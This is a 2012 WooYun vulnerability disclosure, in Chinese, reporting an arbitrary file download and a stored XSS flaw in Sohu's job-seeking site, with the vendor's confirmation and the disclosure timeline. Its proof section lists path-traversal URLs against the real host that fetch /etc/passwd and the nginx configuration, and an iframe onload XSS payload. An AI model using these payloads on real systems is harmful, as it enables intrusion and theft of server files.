当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012522

漏洞标题:搜狐求职中心任意文件下载和xss漏洞

相关厂商:搜狐

漏洞作者: 心伤的胖子

提交时间:2012-09-21 16:31

修复时间:2012-11-05 16:32

公开时间:2012-11-05 16:32

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-21: 细节已通知厂商并且等待厂商处理中
2012-09-24: 厂商已经确认,细节仅向厂商公开
2012-10-04: 细节向核心白帽子及相关领域专家公开
2012-10-14: 细节向普通白帽子公开
2012-10-24: 细节向实习白帽子公开
2012-11-05: 细节向公众公开

简要描述:

搜狐求职中心某处存在任意文件下载漏洞和存储型xss漏洞

详细说明:

1、任意文件下载漏洞
在个人简历的添加附件处,上传附件后的附件下载地址为
http://hr.sohu.com/backend.php/interface/getdoc/?path=file/src/2012-09-21/xxx.doc&name=xxx.docx
后端程序没有对path进行校验,造成可以下载服务器上的任意文件(在权限允许的范围内)。
2、存储型XSS漏洞
编辑粘贴简历功能处,用的编辑器,但是对很多可以触发xss漏洞的标签等没有做处理,可以触发xss漏洞。

漏洞证明:

1、任意文件下载漏洞
下载/etc/passwd,通过下面的URL:
http://hr.sohu.com/backend.php/interface/getdoc/?path=../../../../etc/passwd&name=passwd.txt
下载nginx的配置文件,通过下面的URL:
http://hr.sohu.com/backend.php/interface/getdoc/?path=../../../../usr/local/nginx/conf/nginx.conf&name=nginx.conf
还可以下载WEB目录内的文件。


2、存储型XSS漏洞
在编辑器中选择源代码,然后输入</textarea><iframe/onload=alert(1)><textarea>
通过下面的URL可以触发xss漏洞,不过该漏洞貌似仅对自己有效,不知道后台编辑会不会出现该问题。
http://hr.sohu.com/resume/addpaste?rid=467486&lid=1&uid=434627&talentTypeId=20&id=467486&op=add&jid=0

修复方案:

总结一下,所有输入输出都是有害的,需要进行严格的校验和过滤。

版权声明:转载请注明来源 心伤的胖子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-09-24 09:57

厂商回复:

最新状态:

暂无